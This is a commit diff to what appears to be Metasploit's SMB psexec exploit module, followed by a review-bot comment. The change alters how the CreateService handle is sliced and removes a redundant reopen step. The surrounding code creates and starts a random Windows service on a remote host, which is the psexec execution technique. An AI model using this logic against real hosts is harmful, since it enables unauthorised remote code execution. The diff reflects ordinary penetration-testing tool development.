Re-use CreateService Handle

and remove unused variable
bug/bundler_fix
Meatballs 2014-03-06 21:37:49 +00:00
parent 5606958320
commit 311d4665ce
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 2 additions and 18 deletions


@ -72,7 +72,6 @@ module Exploit::Remote::SMB::Psexec
end end
servicename = Rex::Text.rand_text_alpha(11) servicename = Rex::Text.rand_text_alpha(11)
displayname = Rex::Text.rand_text_alpha(16) displayname = Rex::Text.rand_text_alpha(16)
holdhandle = scm_handle
svc_handle = nil svc_handle = nil
svc_status = nil svc_status = nil
stubdata = stubdata =
@ -93,29 +92,14 @@ module Exploit::Remote::SMB::Psexec
vprint_status("#{peer} - Creating the service...") vprint_status("#{peer} - Creating the service...")
response = dcerpc.call(0x0c, stubdata) response = dcerpc.call(0x0c, stubdata)
if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
svc_handle = dcerpc.last_response.stub_data[0,20] svc_handle = dcerpc.last_response.stub_data[4,20]
svc_status = dcerpc.last_response.stub_data[24,4] svc_status = dcerpc.last_response.stub_data[24,4]
end end
rescue ::Exception => e rescue ::Exception => e
print_error("#{peer} - Error creating service: #{e}") print_error("#{peer} - Error creating service: #{e}")
return false return false
end end
vprint_status("#{peer} - Closing service handle...")
begin
response = dcerpc.call(0x0, svc_handle)
rescue ::Exception
end
vprint_status("#{peer} - Opening service...")
begin
stubdata = scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF)
response = dcerpc.call(0x10, stubdata)
if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
svc_handle = dcerpc.last_response.stub_data[0,20]
end
rescue ::Exception => e
print_error("#{peer} - Error opening service: #{e}")
return false
end
vprint_status("#{peer} - Starting the service...") vprint_status("#{peer} - Starting the service...")
stubdata = svc_handle + NDR.long(0) + NDR.long(0) stubdata = svc_handle + NDR.long(0) + NDR.long(0)
begin begin
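Review bot: The handle sliced from `stub_data[4,20]` now feeds the start call directly, yet nothing in the visible lines validates it: when `last_response` or its `stub_data` is nil, `svc_handle` stays nil and `stubdata = svc_handle + NDR.long(0) + NDR.long(0)` raises outside the following `begin`, and `svc_status` is extracted but never checked here. A guard after the create block such as `return false if svc_handle.nil? || svc_status.to_s.unpack('V').first != 0` would stop on a failed create instead of continuing with an unusable handle. The offsets are also unexplained; a comment like `# reply layout: 4 leading bytes (presumably the tag-id pointer), 20-byte handle, 4-byte status` would record why the slice moved from 0 to 4. The enclosing method starts and ends outside this hunk, so a later status check may exist that is not visible here.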